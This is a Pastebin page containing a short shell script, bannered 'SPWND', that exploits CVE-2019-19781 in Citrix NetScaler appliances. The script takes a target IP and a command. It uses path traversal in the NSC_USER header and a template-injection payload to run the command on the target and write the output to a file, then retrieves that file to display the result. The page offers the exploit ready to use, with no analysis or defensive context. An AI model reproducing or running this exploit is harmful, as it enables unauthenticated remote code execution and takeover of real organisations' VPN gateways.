SHARE
TWEET

Untitled

a guest Jan 14th, 2020 84 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/ash
  2. echo "--------------------------------------------
  3. ███████╗██████╗ ██╗    ██╗███╗   ██╗██████╗
  4. ██╔════╝██╔══██╗██║    ██║████╗  ██║██╔══██╗
  5. ███████╗██████╔╝██║ █╗ ██║██╔██╗ ██║██║  ██║
  6. ╚════██║██╔═══╝ ██║███╗██║██║╚██╗██║██║  ██║
  7. ███████║██║     ╚███╔███╔╝██║ ╚████║██████╔╝
  8. ╚══════╝╚═╝      ╚══╝╚══╝ ╚═╝  ╚═══╝╚═════╝
  9. --------------------------------------------"
  10. if [ -z "$1" ];
  11. then
  12.     echo -ne 'Usage : ash CVE-2019-19781.sh IP CMD\n'
  13.     exit;
  14. fi
  15.  
  16. filenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);
  17. curl --insecure -s -k "https://$1/vpn/../vpns/portal/scripts/newbm.pl" -d "url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'$2 | tee /netscaler/portal/templates/$filenameid.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb" -H "NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid" -H 'NSC_NONCE: spwnd11' -H 'Content-type:
  18. application/x-www-form-urlencoded' --path-as-is
  19. echo -ne "\n" ;curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -s -H "NSC_NONCE: spwnd11" -H "NSC_USER: spwnd11" --path-as-is
  20. echo -ne "Command Output :\n"
  21. curl --insecure -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -H "NSC_NONCE: spwnd11" -H "NSC_USER: spwnd11" --path-as-is
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top